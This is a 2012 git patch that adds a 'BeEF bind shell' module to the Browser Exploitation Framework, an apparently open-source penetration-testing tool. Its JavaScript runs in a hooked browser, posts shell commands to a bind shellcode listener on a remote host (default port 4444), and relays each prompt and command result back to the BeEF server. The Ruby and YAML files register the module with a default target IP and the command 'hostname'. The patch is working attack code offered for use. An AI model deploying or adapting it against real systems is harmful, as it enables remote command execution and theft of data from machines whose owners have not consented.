From 79bf6f4a9f654979c168f37d896147b49368b956 Mon Sep 17 00:00:00 2001
From: antisnatchor <antisnatchor@gmail.com>
Date: Mon, 22 Oct 2012 16:07:31 +1100
Subject: [PATCH] Added BeEF_bind send_command module: this is used to
 communicate with the BeEF_bind shellcode (including in the IPEC admin_ui
 shell).

---
 .../beefbind/beef_bind_shell/command.js       | 95 +++++++++++++++++++
 .../beefbind/beef_bind_shell/config.yaml      | 25 +++++
 .../beefbind/beef_bind_shell/module.rb        | 31 ++++++
 3 files changed, 151 insertions(+)
 create mode 100755 modules/exploits/beefbind/beef_bind_shell/command.js
 create mode 100755 modules/exploits/beefbind/beef_bind_shell/config.yaml
 create mode 100755 modules/exploits/beefbind/beef_bind_shell/module.rb

diff --git a/modules/exploits/beefbind/beef_bind_shell/command.js b/modules/exploits/beefbind/beef_bind_shell/command.js
new file mode 100755
index 000000000..288e42f09
--- /dev/null
+++ b/modules/exploits/beefbind/beef_bind_shell/command.js
@@ -0,0 +1,95 @@
+//
+//   Copyright 2012 Wade Alcorn wade@bindshell.net
+//
+//   Licensed under the Apache License, Version 2.0 (the "License");
+//   you may not use this file except in compliance with the License.
+//   You may obtain a copy of the License at
+//
+//       http://www.apache.org/licenses/LICENSE-2.0
+//
+//   Unless required by applicable law or agreed to in writing, software
+//   distributed under the License is distributed on an "AS IS" BASIS,
+//   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+//   See the License for the specific language governing permissions and
+//   limitations under the License.
+//
+beef.execute(function () {
+    var rhost = '<%= @rhost %>';
+    var rport = '<%= @rport %>';
+    var path = '<%= @path %>';
+    var cmd = '<%= @cmd %>';
+
+    var uri = "http://" + rhost + ":" + rport + path;
+
+    strip_output = function(output){
+
+        var offset = 0;
+        for(var c in output){
+            c = output.charAt(c);
+            if(c.charCodeAt(0) == 0){
+                break;
+            }
+            offset++;
+        }
+        return output.substring(0,offset);
+    };
+
+    var counter = 0;
+    get_additional_cmd_results = function(){
+        xhr = new XMLHttpRequest();
+        xhr.onreadystatechange = function(){
+            if(xhr.readyState == 4){
+                var result = strip_output(xhr.responseText);
+                console.log("result.length: " + result.length);
+                if(result.length != 0){
+                    console.log("get_additional_cmd_results - readyState == 4: request [" + counter + "]\r\n" + result);
+                    beef.net.send("<%= @command_url %>", <%= @command_id %>, result);
+                        counter++;
+                        setTimeout("get_additional_cmd_results()",500);
+                        }
+             }else{ // No more command results, ready to send another command.
+                console.log("get_additional_cmd_results - readyState != 4: request [" + counter + "]");
+            }
+        };
+        xhr.open("GET", uri, false);
+        xhr.send(null);
+    };
+
+    get_prompt = function () {
+
+        xhr = new XMLHttpRequest();
+        xhr.onreadystatechange = function(){
+            if(xhr.readyState == 4){
+                console.log("get_prompt: Retrieved prompt");
+                var prompt = strip_output(xhr.responseText);
+                console.log(prompt);
+                beef.net.send("<%= @command_url %>", <%= @command_id %>, prompt);
+
+                //send command
+                send_command(cmd);
+            }
+        };
+        xhr.open("GET", uri, false);
+        xhr.send(null);
+    };
+
+    send_command = function(command){
+        xhr = new XMLHttpRequest();
+        xhr.onreadystatechange = function(){
+            var cmd_result = strip_output(xhr.responseText);
+            console.log(cmd_result);
+            beef.net.send("<%= @command_url %>", <%= @command_id %>, cmd_result);
+        };
+        xhr.open("POST", uri, false);
+        xhr.setRequestHeader("Content-Type", "text/plain");
+        command = "cmd=" + command + "\r\n"; // very important CRLF, otherwise the shellcode returns "More?"
+        xhr.send(command);
+        setTimeout("get_additional_cmd_results()",500);
+    };
+
+
+
+get_prompt();
+
+});
+
diff --git a/modules/exploits/beefbind/beef_bind_shell/config.yaml b/modules/exploits/beefbind/beef_bind_shell/config.yaml
new file mode 100755
index 000000000..9ce2708a9
--- /dev/null
+++ b/modules/exploits/beefbind/beef_bind_shell/config.yaml
@@ -0,0 +1,25 @@
+#
+#   Copyright 2012 Wade Alcorn wade@bindshell.net
+#
+#   Licensed under the Apache License, Version 2.0 (the "License");
+#   you may not use this file except in compliance with the License.
+#   You may obtain a copy of the License at
+#
+#       http://www.apache.org/licenses/LICENSE-2.0
+#
+#   Unless required by applicable law or agreed to in writing, software
+#   distributed under the License is distributed on an "AS IS" BASIS,
+#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+#   See the License for the specific language governing permissions and
+#   limitations under the License.
+#
+beef:
+    module:
+        BeEF_bind_shell:
+            enable: true
+            category: ["Exploits", "BeEF_bind"]
+            name: "BeEF bind shell"
+            description: "Send commands to be executed on the already deployed BeEF_bind shellcode, and get results back."
+            authors: ["antisnatchor", "tymiller"] # shellcode awesomeness -> Ty Miller
+            target:
+                working: ["FF","C","S"]
diff --git a/modules/exploits/beefbind/beef_bind_shell/module.rb b/modules/exploits/beefbind/beef_bind_shell/module.rb
new file mode 100755
index 000000000..30e7d174a
--- /dev/null
+++ b/modules/exploits/beefbind/beef_bind_shell/module.rb
@@ -0,0 +1,31 @@
+#
+#   Copyright 2012 Wade Alcorn wade@bindshell.net
+#
+#   Licensed under the Apache License, Version 2.0 (the "License");
+#   you may not use this file except in compliance with the License.
+#   You may obtain a copy of the License at
+#
+#       http://www.apache.org/licenses/LICENSE-2.0
+#
+#   Unless required by applicable law or agreed to in writing, software
+#   distributed under the License is distributed on an "AS IS" BASIS,
+#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+#   See the License for the specific language governing permissions and
+#   limitations under the License.
+#
+class Beef_bind_shell < BeEF::Core::Command
+
+	def self.options
+		return [
+      { 'name' => 'rhost', 'ui_label' => 'Host', 'value' => '172.16.67.135'},
+      { 'name' => 'rport', 'ui_label' => 'BeEF Bind Port', 'value' => '4444'},
+      { 'name' => 'path', 'ui_label' => 'Path', 'value' => '/'},
+      { 'name' => 'cmd', 'ui_label' => 'Command', 'value' => 'hostname'}
+		]
+	end
+
+	def post_execute
+		save({'result' => @datastore['result']})
+	end
+
+end